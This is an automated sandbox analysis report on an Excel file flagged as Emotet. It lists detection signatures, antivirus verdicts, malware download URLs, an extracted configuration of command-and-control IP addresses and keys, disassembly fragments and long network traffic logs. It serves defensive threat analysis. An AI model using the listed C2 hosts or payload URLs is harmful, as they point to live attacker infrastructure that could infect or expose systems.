Windows Analysis Report
4470_02112022.xls

Overview

General Information

Sample Name: 4470_02112022.xls
Analysis ID: 746414
MD5: d3b182de8c99553a9f2b6d0f3f030a4f
SHA1: d5bd989ffde2f67133b6404f9f234d13e618c206
SHA256: cd99b899c5a3d6ddb22969605b079375da897362b4d599fc9eebb1e21115a31d
Infos:

Detection

Hidden Macro 4.0, Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Document exploit detected (drops PE files)
Antivirus / Scanner detection for submitted sample
Yara detected Emotet
System process connects to network (likely due to code injection or exploit)
Document exploit detected (creates forbidden files)
Antivirus detection for URL or domain
Found malicious Excel 4.0 Macro
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Creates an autostart registry key pointing to binary in C:\Windows
Office process drops PE file
Found Excel 4.0 Macro with suspicious formulas
Outdated Microsoft Office dropper detected
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Hides that the sample has been downloaded from the Internet (zone.identifier)
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Detected potential crypto function
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Downloads executable code via HTTP
Uses insecure TLS / SSL version for HTTPS connection
Drops files with a non-matching file extension (content does not match file extension)
Found inlined nop instructions (likely shell or obfuscated code)
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
PE file contains an invalid checksum
Drops PE files
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Connects to several IPs in different countries
Potential key logger detected (key state polling based)
Registers a DLL
Drops PE files to the user directory
Found large amount of non-executed APIs
Uses Microsoft's Enhanced Cryptographic Provider
Potential document exploit detected (performs HTTP gets)
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection

barindex
Source: 4470_02112022.xls ReversingLabs: Detection: 80%
Source: 4470_02112022.xls Virustotal: Detection: 67% Perma Link
Source: 4470_02112022.xls Metadefender: Detection: 31% Perma Link
Source: 4470_02112022.xls Avira: detected
Source: https://www.3d-stickers.com/page-non-trouvee Avira URL Cloud: Label: malware
Source: https://www.spinbalence.com/Adapter/moycMR/ Avira URL Cloud: Label: malware
Source: https://www.spinbalence.com/index.php?controller=404 Avira URL Cloud: Label: malware
Source: http://www.3d-stickers.com/Content/Afa1PcRuxh/ Avira URL Cloud: Label: malware
Source: http://navylin.com/bsavxiv/axHQYKl/ Avira URL Cloud: Label: malware
Source: http://www.spinbalence.com/Adapter/moycMR/ Avira URL Cloud: Label: malware
Source: www.3d-stickers.com Virustotal: Detection: 12% Perma Link
Source: www.spinbalence.com Virustotal: Detection: 12% Perma Link
Source: navylin.com Virustotal: Detection: 13% Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\40hd04O0[1].dll ReversingLabs: Detection: 80%
Source: C:\Users\user\oxnv4.ooccxx ReversingLabs: Detection: 80%
Source: C:\Windows\System32\SnILCOTnpOOFucYhP\FatGkw.dll (copy) ReversingLabs: Detection: 80%
Source: 00000009.00000002.1210607529.000000000039A000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: Emotet {"C2 list": ["218.38.121.17:443", "186.250.48.5:443", "80.211.107.116:8080", "174.138.33.49:7080", "165.22.254.236:8080", "185.148.169.10:8080", "62.171.178.147:8080", "128.199.217.206:443", "210.57.209.142:8080", "36.67.23.59:443", "160.16.143.191:8080", "128.199.242.164:8080", "178.238.225.252:8080", "118.98.72.86:443", "202.134.4.210:7080", "82.98.180.154:7080", "54.37.228.122:443", "64.227.55.231:8080", "195.77.239.39:8080", "103.254.12.236:7080", "103.85.95.4:8080", "178.62.112.199:8080", "83.229.80.93:8080", "114.79.130.68:443", "51.75.33.122:443", "139.196.72.155:8080", "188.165.79.151:443", "190.145.8.4:443", "196.44.98.190:8080", "198.199.70.22:8080", "103.56.149.105:8080", "104.244.79.94:443", "87.106.97.83:7080", "103.71.99.57:8080", "46.101.98.60:8080", "103.126.216.86:443", "103.224.241.74:8080", "37.44.244.177:8080", "85.214.67.203:8080", "202.28.34.99:8080", "175.126.176.79:8080", "85.25.120.45:8080", "93.104.209.107:8080", "103.41.204.169:8080", "78.47.204.80:443", "139.59.80.108:8080"], "Public Key": ["RUNTMSAAAAD0LxqDNhonUYwk8sqo7IWuUllRdUiUBnACc6romsQoe1YJD7wIe4AheqYofpZFucPDXCZ0z9i+ooUffqeoLZU0qPVGSlYAAIg=", "RUNLMSAAAADYNZPXY4tQxd/N4Wn5sTYAm5tUOxY2ol1ELrI4MNhHNi640vSLasjYTHpFRBoG+o84vtr7AJachCzOHjaAJFCWrfVGSlYAAIg="]}
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_100061AC CryptStringToBinaryA,CryptStringToBinaryA, 8_2_100061AC
Source: unknown HTTPS traffic detected: 218.38.121.17:443 -> 192.168.2.22:49178 version: TLS 1.0
Source: unknown HTTPS traffic detected: 218.38.121.17:443 -> 192.168.2.22:49179 version: TLS 1.0
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: unknown HTTPS traffic detected: 163.172.115.127:443 -> 192.168.2.22:49172 version: TLS 1.2
Source: unknown HTTPS traffic detected: 163.172.108.69:443 -> 192.168.2.22:49175 version: TLS 1.2
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_00000001800132FC FindNextFileW,FindFirstFileW,FindClose, 9_2_00000001800132FC
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_00000001800132FC FindNextFileW,FindFirstFileW,FindClose, 10_2_00000001800132FC

Software Vulnerabilities

barindex
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: 40hd04O0[1].dll.0.dr Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\40hd04O0[1].dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA Jump to behavior
Source: global traffic DNS query: name: sat7ate.com
Source: global traffic DNS query: name: www.spinbalence.com
Source: global traffic DNS query: name: www.3d-stickers.com
Source: global traffic DNS query: name: navylin.com
Source: C:\Windows\System32\regsvr32.exe Code function: 4x nop then lea r8, qword ptr [000000001009B410h] 8_2_1003B380
Source: C:\Windows\System32\regsvr32.exe Code function: 4x nop then lea rdx, qword ptr [000000001009C2C4h] 8_2_1003BC30
Source: C:\Windows\System32\regsvr32.exe Code function: 4x nop then mov rax, qword ptr [rsi] 8_2_100520A0
Source: C:\Windows\System32\regsvr32.exe Code function: 4x nop then movzx eax, byte ptr [rdx] 8_2_10030280
Source: C:\Windows\System32\regsvr32.exe Code function: 4x nop then movzx eax, byte ptr [rdx] 8_2_10030280
Source: C:\Windows\System32\regsvr32.exe Code function: 4x nop then sub r11, 01h 8_2_1004B340
Source: C:\Windows\System32\regsvr32.exe Code function: 4x nop then sub r11, 01h 8_2_1004B438
Source: C:\Windows\System32\regsvr32.exe Code function: 4x nop then sub r11, 01h 8_2_1004B4C9
Source: C:\Windows\System32\regsvr32.exe Code function: 4x nop then movzx eax, byte ptr [rcx+rdx] 8_2_1003A4F0
Source: C:\Windows\System32\regsvr32.exe Code function: 4x nop then movsxd rbx, qword ptr [r14+10h] 8_2_1002E500
Source: C:\Windows\System32\regsvr32.exe Code function: 4x nop then sub r11, 01h 8_2_1004B56D
Source: C:\Windows\System32\regsvr32.exe Code function: 4x nop then sub r11, 01h 8_2_1004B5C8
Source: C:\Windows\System32\regsvr32.exe Code function: 4x nop then cmp dword ptr [rsp+rax*4+28h], edi 8_2_1004A5E0
Source: C:\Windows\System32\regsvr32.exe Code function: 4x nop then cmp dword ptr [rsp+rcx*4+28h], ebx 8_2_1004A5E0
Source: C:\Windows\System32\regsvr32.exe Code function: 4x nop then mov edx, dword ptr [rsp+r8*4+28h] 8_2_1004A5E0
Source: C:\Windows\System32\regsvr32.exe Code function: 4x nop then cmp rcx, r8 8_2_1004A5E0
Source: C:\Windows\System32\regsvr32.exe Code function: 4x nop then sub r11, 01h 8_2_1004B66E
Source: C:\Windows\System32\regsvr32.exe Code function: 4x nop then mov al, bpl 8_2_100416F8
Source: C:\Windows\System32\regsvr32.exe Code function: 4x nop then sub r11, 01h 8_2_1004B709
Source: C:\Windows\System32\regsvr32.exe Code function: 4x nop then sub r11, 01h 8_2_1004B72E
Source: C:\Windows\System32\regsvr32.exe Code function: 4x nop then sub r11, 01h 8_2_1004B79C
Source: C:\Windows\System32\regsvr32.exe Code function: 4x nop then sub r11, 01h 8_2_1004B7DC
Source: C:\Windows\System32\regsvr32.exe Code function: 4x nop then sub r11, 01h 8_2_1004B814
Source: C:\Windows\System32\regsvr32.exe Code function: 4x nop then sub r11, 01h 8_2_1004B85C
Source: C:\Windows\System32\regsvr32.exe Code function: 4x nop then sub r11, 01h 8_2_1004B901
Source: C:\Windows\System32\regsvr32.exe Code function: 4x nop then movzx eax, byte ptr [r8] 8_2_10046980
Source: C:\Windows\System32\regsvr32.exe Code function: 4x nop then mov r8, rdi 8_2_100389D0
Source: C:\Windows\System32\regsvr32.exe Code function: 4x nop then movsxd rcx, qword ptr [r12+10h] 8_2_1002EA00
Source: C:\Windows\System32\regsvr32.exe Code function: 4x nop then mov rax, r8 8_2_10037CB0
Source: C:\Windows\System32\regsvr32.exe Code function: 4x nop then movzx ecx, byte ptr [r10] 8_2_1004DCD0
Source: C:\Windows\System32\regsvr32.exe Code function: 4x nop then lea rbx, qword ptr [rsp+70h] 8_2_1003DD80
Source: C:\Windows\System32\regsvr32.exe Code function: 4x nop then movsxd rax, rcx 8_2_10046D80
Source: C:\Windows\System32\regsvr32.exe Code function: 4x nop then movzx ecx, byte ptr [r10] 8_2_1004DE00
Source: C:\Windows\System32\regsvr32.exe Code function: 4x nop then mov r8d, ebx 8_2_1004DF10
Source: C:\Windows\System32\regsvr32.exe Code function: 4x nop then mov eax, r10d 8_2_1004BFF0
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 163.172.115.127:80
Source: global traffic TCP traffic: 163.172.115.127:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 163.172.115.127:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 163.172.115.127:80
Source: global traffic TCP traffic: 163.172.115.127:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 163.172.115.127:80
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 163.172.115.127:443
Source: global traffic TCP traffic: 163.172.115.127:443 -> 192.168.2.22:49172
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 163.172.115.127:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 163.172.115.127:443
Source: global traffic TCP traffic: 163.172.115.127:443 -> 192.168.2.22:49172
Source: global traffic TCP traffic: 163.172.115.127:443 -> 192.168.2.22:49172
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 163.172.115.127:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 163.172.115.127:443
Source: global traffic TCP traffic: 163.172.115.127:443 -> 192.168.2.22:49172
Source: global traffic TCP traffic: 163.172.115.127:443 -> 192.168.2.22:49172
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 163.172.115.127:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 163.172.115.127:443
Source: global traffic TCP traffic: 163.172.115.127:443 -> 192.168.2.22:49172
Source: global traffic TCP traffic: 163.172.115.127:443 -> 192.168.2.22:49172
Source: global traffic TCP traffic: 163.172.115.127:443 -> 192.168.2.22:49172
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 163.172.115.127:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 163.172.115.127:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 163.172.115.127:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 163.172.115.127:443
Source: global traffic TCP traffic: 163.172.115.127:443 -> 192.168.2.22:49172
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 163.172.115.127:443
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 163.172.115.127:443
Source: global traffic TCP traffic: 163.172.115.127:443 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 163.172.115.127:443
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 163.172.115.127:443
Source: global traffic TCP traffic: 163.172.115.127:443 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 163.172.115.127:443 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 163.172.115.127:443
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 163.172.115.127:443
Source: global traffic TCP traffic: 163.172.115.127:443 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 163.172.115.127:443
Source: global traffic TCP traffic: 163.172.115.127:443 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 163.172.115.127:443 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 163.172.115.127:443
Source: global traffic TCP traffic: 163.172.115.127:443 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 163.172.115.127:443
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 163.172.115.127:443
Source: global traffic TCP traffic: 163.172.115.127:443 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 163.172.115.127:443 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 163.172.115.127:443
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 163.172.115.127:443
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 163.172.115.127:443
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 163.172.115.127:443
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 163.172.115.127:443
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 163.172.115.127:443
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 163.172.115.127:443
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 163.172.108.69:80
Source: global traffic TCP traffic: 163.172.108.69:80 -> 192.168.2.22:49174
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 163.172.108.69:80
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 163.172.108.69:80
Source: global traffic TCP traffic: 163.172.108.69:80 -> 192.168.2.22:49174
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 163.172.108.69:80
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 163.172.108.69:443
Source: global traffic TCP traffic: 163.172.108.69:443 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 163.172.108.69:443
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 163.172.108.69:443
Source: global traffic TCP traffic: 163.172.108.69:443 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 163.172.108.69:443 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 163.172.108.69:443
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 163.172.108.69:443
Source: global traffic TCP traffic: 163.172.108.69:443 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 163.172.108.69:443 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 163.172.108.69:443
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 163.172.108.69:443
Source: global traffic TCP traffic: 163.172.108.69:443 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 163.172.108.69:443 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 163.172.108.69:443
Source: global traffic TCP traffic: 163.172.108.69:443 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 163.172.108.69:443
Source: global traffic TCP traffic: 163.172.108.69:443 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 163.172.108.69:443
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 163.172.108.69:443
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 163.172.108.69:443
Source: global traffic TCP traffic: 163.172.108.69:443 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 163.172.108.69:443
Source: global traffic TCP traffic: 192.168.2.22:49176 -> 163.172.108.69:443
Source: global traffic TCP traffic: 163.172.108.69:443 -> 192.168.2.22:49176
Source: global traffic TCP traffic: 192.168.2.22:49176 -> 163.172.108.69:443
Source: global traffic TCP traffic: 192.168.2.22:49176 -> 163.172.108.69:443
Source: global traffic TCP traffic: 163.172.108.69:443 -> 192.168.2.22:49176
Source: global traffic TCP traffic: 163.172.108.69:443 -> 192.168.2.22:49176
Source: global traffic TCP traffic: 192.168.2.22:49176 -> 163.172.108.69:443
Source: global traffic TCP traffic: 192.168.2.22:49176 -> 163.172.108.69:443
Source: global traffic TCP traffic: 163.172.108.69:443 -> 192.168.2.22:49176
Source: global traffic TCP traffic: 192.168.2.22:49176 -> 163.172.108.69:443
Source: global traffic TCP traffic: 163.172.108.69:443 -> 192.168.2.22:49176
Source: global traffic TCP traffic: 163.172.108.69:443 -> 192.168.2.22:49176
Source: global traffic TCP traffic: 192.168.2.22:49176 -> 163.172.108.69:443
Source: global traffic TCP traffic: 163.172.108.69:443 -> 192.168.2.22:49176
Source: global traffic TCP traffic: 192.168.2.22:49176 -> 163.172.108.69:443
Source: global traffic TCP traffic: 163.172.108.69:443 -> 192.168.2.22:49176
Source: global traffic TCP traffic: 163.172.108.69:443 -> 192.168.2.22:49176
Source: global traffic TCP traffic: 163.172.108.69:443 -> 192.168.2.22:49176
Source: global traffic TCP traffic: 192.168.2.22:49176 -> 163.172.108.69:443
Source: global traffic TCP traffic: 163.172.108.69:443 -> 192.168.2.22:49176
Source: global traffic TCP traffic: 192.168.2.22:49176 -> 163.172.108.69:443
Source: global traffic TCP traffic: 192.168.2.22:49176 -> 163.172.108.69:443
Source: global traffic TCP traffic: 163.172.108.69:443 -> 192.168.2.22:49176
Source: global traffic TCP traffic: 192.168.2.22:49176 -> 163.172.108.69:443
Source: global traffic TCP traffic: 163.172.108.69:443 -> 192.168.2.22:49176
Source: global traffic TCP traffic: 192.168.2.22:49176 -> 163.172.108.69:443
Source: global traffic TCP traffic: 163.172.108.69:443 -> 192.168.2.22:49176
Source: global traffic TCP traffic: 192.168.2.22:49176 -> 163.172.108.69:443
Source: global traffic TCP traffic: 163.172.108.69:443 -> 192.168.2.22:49176
Source: global traffic TCP traffic: 192.168.2.22:49176 -> 163.172.108.69:443
Source: global traffic TCP traffic: 163.172.108.69:443 -> 192.168.2.22:49176
Source: global traffic TCP traffic: 192.168.2.22:49176 -> 163.172.108.69:443
Source: global traffic TCP traffic: 192.168.2.22:49176 -> 163.172.108.69:443
Source: global traffic TCP traffic: 163.172.108.69:443 -> 192.168.2.22:49176
Source: global traffic TCP traffic: 192.168.2.22:49176 -> 163.172.108.69:443
Source: global traffic TCP traffic: 192.168.2.22:49176 -> 163.172.108.69:443
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
